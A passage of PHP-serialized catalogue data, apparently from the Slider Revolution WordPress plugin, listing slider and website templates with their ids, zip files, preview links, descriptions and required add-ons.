target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Photographer Website Template\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"1\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"40\";s:9:\"installed\";b:0;}i:482;a:23:{s:2:\"id\";s:3:\"518\";s:5:\"title\";s:25:\"Black Friday Scroll Video\";s:5:\"alias\";s:25:\"black-friday-scroll-video\";s:3:\"zip\";s:29:\"black-friday-scroll-video.zip\";s:3:\"uid\";s:32:\"a6a4ab2e2f703aaee0a1e6121881bdd8\";s:3:\"img\";s:36:\"black-friday-scroll-video/slide1.jpg\";s:7:\"preview\";s:69:\"https://www.sliderrevolution.com/templates/black-friday-video-scroll/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.4.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:169:\"<span class=\"ttm_content\">Blackfriday offers are coming towards you from the depths of space, with this scroll-based hero module.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:370:\"[{\"path\":\"revslider-lottie-addon\\/revslider-lottie-addon.php\",\"name\":\"Slider Revolution Lottie AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"},{\"path\":\"revslider-scrollvideo-addon\\/revslider-scrollvideo-addon.php\",\"name\":\"Slider Revolution Scroll Video Add-On\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;s:6:\"is_new\";b:1;}i:484;a:25:{s:2:\"id\";s:3:\"520\";s:5:\"title\";s:12:\"Charity Menu\";s:5:\"alias\";s:12:\"charity-menu\";s:3:\"zip\";s:22:\"packs/charity-menu.zip\";s:3:\"uid\";s:32:\"77794a39041c7f128de3b5ad9b8e7d0d\";s:3:\"img\";s:23:\"charity-menu/slide1.jpg\";s:7:\"preview\";s:70:\"https://www.sliderrevolution.com/templates/charity-non-profit-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The \"Charity Non-Profit Website\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:26:\"Charity Non-Profit-Website\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"41\";s:9:\"installed\";b:0;}i:485;a:25:{s:2:\"id\";s:3:\"521\";s:5:\"title\";s:14:\"Charity Header\";s:5:\"alias\";s:14:\"charity-header\";s:3:\"zip\";s:24:\"packs/charity-header.zip\";s:3:\"uid\";s:32:\"36096787d4ed62942cbd48f6a57e9d4f\";s:3:\"img\";s:25:\"charity-header/slide1.jpg\";s:7:\"preview\";s:70:\"https://www.sliderrevolution.com/templates/charity-non-profit-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The \"Charity Non-Profit Website\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:26:\"Charity Non-Profit-Website\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"41\";s:9:\"installed\";b:0;}i:486;a:25:{s:2:\"id\";s:3:\"522\";s:5:\"title\";s:15:\"Charity Mission\";s:5:\"alias\";s:15:\"charity-mission\";s:3:\"zip\";s:25:\"packs/charity-mission.zip\";s:3:\"uid\";s:32:\"8c5cd67e3eb51c0ca3e571408ac8e97b\";s:3:\"img\";s:26:\"charity-mission/slide1.jpg\";s:7:\"preview\";s:70:\"https://www.sliderrevolution.com/templates/charity-non-profit-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The \"Charity Non-Profit Website\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:177:\"[{\"path\":\"revslider-lottie-addon\\/revslider-lottie-addon.php\",\"name\":\"Slider Revolution Lottie AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:26:\"Charity Non-Profit-Website\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"41\";s:9:\"installed\";b:0;}i:487;a:25:{s:2:\"id\";s:3:\"523\";s:5:\"title\";s:13:\"Charity Funds\";s:5:\"alias\";s:13:\"charity-funds\";s:3:\"zip\";s:23:\"packs/charity-funds.zip\";s:3:\"uid\";s:32:\"10da554c7529ef91965e1618a04b410b\";s:3:\"img\";s:24:\"charity-funds/slide1.jpg\";s:7:\"preview\";s:70:\"https://www.sliderrevolution.com/templates/charity-non-profit-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The \"Charity Non-Profit Website\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:177:\"[{\"path\":\"revslider-lottie-addon\\/revslider-lottie-addon.php\",\"name\":\"Slider Revolution Lottie AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:26:\"Charity Non-Profit-Website\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"41\";s:9:\"installed\";b:0;}i:488;a:25:{s:2:\"id\";s:3:\"524\";s:5:\"title\";s:15:\"Charity Success\";s:5:\"alias\";s:15:\"charity-success\";s:3:\"zip\";s:25:\"packs/charity-success.zip\";s:3:\"uid\";s:32:\"0c35448c1905272606e87447886a348e\";s:3:\"img\";s:26:\"charity-success/slide1.jpg\";s:7:\"preview\";s:70:\"https://www.sliderrevolution.com/templates/charity-non-profit-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The \"Charity Non-Profit Website\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";s:177:\"[{\"path\":\"revslider-lottie-addon\\/revslider-lottie-addon.php\",\"name\":\"Slider Revolution Lottie AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:26:\"Charity Non-Profit-Website\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"41\";s:9:\"installed\";b:0;}i:489;a:25:{s:2:\"id\";s:3:\"525\";s:5:\"title\";s:15:\"Charity Stories\";s:5:\"alias\";s:15:\"charity-stories\";s:3:\"zip\";s:25:\"packs/charity-stories.zip\";s:3:\"uid\";s:32:\"f277f145d9f9c3f0033bb8ceffeb4c9f\";s:3:\"img\";s:26:\"charity-stories/slide1.jpg\";s:7:\"preview\";s:70:\"https://www.sliderrevolution.com/templates/charity-non-profit-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The \"Charity Non-Profit Website\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:26:\"Charity Non-Profit-Website\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"41\";s:9:\"installed\";b:0;}i:490;a:25:{s:2:\"id\";s:3:\"526\";s:5:\"title\";s:16:\"Charity Worldmap\";s:5:\"alias\";s:16:\"charity-worldmap\";s:3:\"zip\";s:26:\"packs/charity-worldmap.zip\";s:3:\"uid\";s:32:\"9e00cbac269b92cb24fd3230297f4685\";s:3:\"img\";s:27:\"charity-worldmap/slide1.jpg\";s:7:\"preview\";s:70:\"https://www.sliderrevolution.com/templates/charity-non-profit-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The \"Charity Non-Profit Website\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:26:\"Charity Non-Profit-Website\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"41\";s:9:\"installed\";b:0;}i:491;a:25:{s:2:\"id\";s:3:\"527\";s:5:\"title\";s:19:\"Charity Large Image\";s:5:\"alias\";s:19:\"charity-large-image\";s:3:\"zip\";s:29:\"packs/charity-large-image.zip\";s:3:\"uid\";s:32:\"fa927036c2b14622832106fa987bc8e7\";s:3:\"img\";s:30:\"charity-large-image/slide1.jpg\";s:7:\"preview\";s:70:\"https://www.sliderrevolution.com/templates/charity-non-profit-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The \"Charity Non-Profit Website\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:26:\"Charity Non-Profit-Website\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"41\";s:9:\"installed\";b:0;}i:492;a:25:{s:2:\"id\";s:3:\"528\";s:5:\"title\";s:16:\"Charity Sponsors\";s:5:\"alias\";s:16:\"charity-sponsors\";s:3:\"zip\";s:26:\"packs/charity-sponsors.zip\";s:3:\"uid\";s:32:\"efd087bc3fa3915139af9e93d47ee295\";s:3:\"img\";s:27:\"charity-sponsors/slide1.jpg\";s:7:\"preview\";s:70:\"https://www.sliderrevolution.com/templates/charity-non-profit-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The \"Charity Non-Profit Website\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:26:\"Charity Non-Profit-Website\";s:13:\"package_order\";s:1:\"9\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"41\";s:9:\"installed\";b:0;}i:493;a:25:{s:2:\"id\";s:3:\"529\";s:5:\"title\";s:12:\"Charity Help\";s:5:\"alias\";s:12:\"charity-help\";s:3:\"zip\";s:22:\"packs/charity-help.zip\";s:3:\"uid\";s:32:\"4f3571c0b27f061648c9ff95b1a3f718\";s:3:\"img\";s:23:\"charity-help/slide1.jpg\";s:7:\"preview\";s:70:\"https://www.sliderrevolution.com/templates/charity-non-profit-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The \"Charity Non-Profit Website\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:26:\"Charity Non-Profit-Website\";s:13:\"package_order\";s:2:\"10\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"41\";s:9:\"installed\";b:0;}i:494;a:25:{s:2:\"id\";s:3:\"530\";s:5:\"title\";s:14:\"Charity Footer\";s:5:\"alias\";s:14:\"charity-footer\";s:3:\"zip\";s:24:\"packs/charity-footer.zip\";s:3:\"uid\";s:32:\"9340fa48c56635a8a781cc37c4bf538c\";s:3:\"img\";s:25:\"charity-footer/slide1.jpg\";s:7:\"preview\";s:70:\"https://www.sliderrevolution.com/templates/charity-non-profit-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The \"Charity Non-Profit Website\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:26:\"Charity Non-Profit-Website\";s:13:\"package_order\";s:2:\"11\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"41\";s:9:\"installed\";b:0;}i:495;a:22:{s:2:\"id\";s:3:\"531\";s:5:\"title\";s:21:\"Cinematic Hero Titles\";s:5:\"alias\";s:21:\"cinematic-hero-titles\";s:3:\"zip\";s:25:\"cinematic-hero-titles.zip\";s:3:\"uid\";s:32:\"51a59c54bb97c274092d22dbf4f6085e\";s:3:\"img\";s:32:\"cinematic-hero-titles/slide1.jpg\";s:7:\"preview\";s:65:\"https://www.sliderrevolution.com/templates/cinematic-hero-titles/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:199:\"<span class=\"ttm_content\">The \"Cinematic Hero Titles\" template is a collection of fullscreen hero blocks that use a cinematic, animated letter-spacing effect..</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";s:177:\"[{\"path\":\"revslider-lottie-addon\\/revslider-lottie-addon.php\",\"name\":\"Slider Revolution Lottie AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:496;a:23:{s:2:\"id\";s:3:\"532\";s:5:\"title\";s:23:\"Design DNA Scroll Video\";s:5:\"alias\";s:23:\"design-dna-scroll-video\";s:3:\"zip\";s:27:\"design-dna-scroll-video.zip\";s:3:\"uid\";s:32:\"39180fc9f7a07e50832fc1a68fb4eba2\";s:3:\"img\";s:34:\"design-dna-scroll-video/slide1.jpg\";s:7:\"preview\";s:67:\"https://www.sliderrevolution.com/templates/design-dna-scroll-video/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.4.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The \"Design DNA Scroll Video\" template isÂ a striking, fullscreen hero module that is using our new Scroll Video addon.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:544:\"[{\"path\":\"revslider-particles-addon\\/revslider-particles-addon.php\",\"name\":\"Particles Effect AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"},{\"path\":\"revslider-lottie-addon\\/revslider-lottie-addon.php\",\"name\":\"Slider Revolution Lottie AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"},{\"path\":\"revslider-scrollvideo-addon\\/revslider-scrollvideo-addon.php\",\"name\":\"Slider Revolution Scroll Video Add-On\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;s:6:\"is_new\";b:1;}i:497;a:22:{s:2:\"id\";s:3:\"533\";s:5:\"title\";s:27:\"Food Delivery Lottie Scroll\";s:5:\"alias\";s:27:\"food-delivery-lottie-scroll\";s:3:\"zip\";s:31:\"food-delivery-lottie-scroll.zip\";s:3:\"uid\";s:32:\"5dfbfac45c5df7702238ba1b43afe8f6\";s:3:\"img\";s:38:\"food-delivery-lottie-scroll/slide1.jpg\";s:7:\"preview\";s:71:\"https://www.sliderrevolution.com/templates/food-delivery-lottie-scroll/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:187:\"<span class=\"ttm_content\">The \"Design DNA Scroll Video\" template isÂ a striking, fullscreen hero module that is using our new Scroll Video addon.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:177:\"[{\"path\":\"revslider-lottie-addon\\/revslider-lottie-addon.php\",\"name\":\"Slider Revolution Lottie AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:499;a:25:{s:2:\"id\";s:3:\"535\";s:5:\"title\";s:20:\"Food Recipe Carousel\";s:5:\"alias\";s:20:\"food-recipe-carousel\";s:3:\"zip\";s:30:\"packs/food-recipe-carousel.zip\";s:3:\"uid\";s:32:\"6ba9695ba1a22a6e99f96431d8fb01e8\";s:3:\"img\";s:31:\"food-recipe-carousel/slide1.jpg\";s:7:\"preview\";s:64:\"https://www.sliderrevolution.com/templates/food-recipe-carousel/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The \"Charity Non-Profit Website\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:8:\"carousel\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Food Recipe Carousel Template\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"42\";s:9:\"installed\";b:0;}i:500;a:25:{s:2:\"id\";s:3:\"536\";s:5:\"title\";s:17:\"Food Recipe Modal\";s:5:\"alias\";s:17:\"food-recipe-modal\";s:3:\"zip\";s:27:\"packs/food-recipe-modal.zip\";s:3:\"uid\";s:32:\"1c5b2e959cd973efc5c1887a3a4279f3\";s:3:\"img\";s:28:\"food-recipe-modal/slide1.jpg\";s:7:\"preview\";s:64:\"https://www.sliderrevolution.com/templates/food-recipe-carousel/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The \"Charity Non-Profit Website\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Food Recipe Carousel Template\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"1\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"42\";s:9:\"installed\";b:0;}i:501;a:25:{s:2:\"id\";s:3:\"519\";s:5:\"title\";s:26:\"Charity Non-Profit-Website\";s:5:\"alias\";s:26:\"charity-non-profit-website\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:26:\"charity-non-profit-website\";s:3:\"img\";s:47:\"packages/charity-non-profit-website-package.jpg\";s:7:\"preview\";s:70:\"https://www.sliderrevolution.com/templates/charity-non-profit-website/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.3.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:202:\"<span class=\"ttm_content\">The \"Charity Non-Profit Website\" is a useful one-page website template with simple & smooth animation effects and animated lottie icons.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";s:177:\"[{\"path\":\"revslider-lottie-addon\\/revslider-lottie-addon.php\",\"name\":\"Slider Revolution Lottie AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:26:\"Charity Non-Profit-Website\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"41\";s:9:\"installed\";b:0;}i:502;a:25:{s:2:\"id\";s:3:\"534\";s:5:\"title\";s:29:\"Food Recipe Carousel 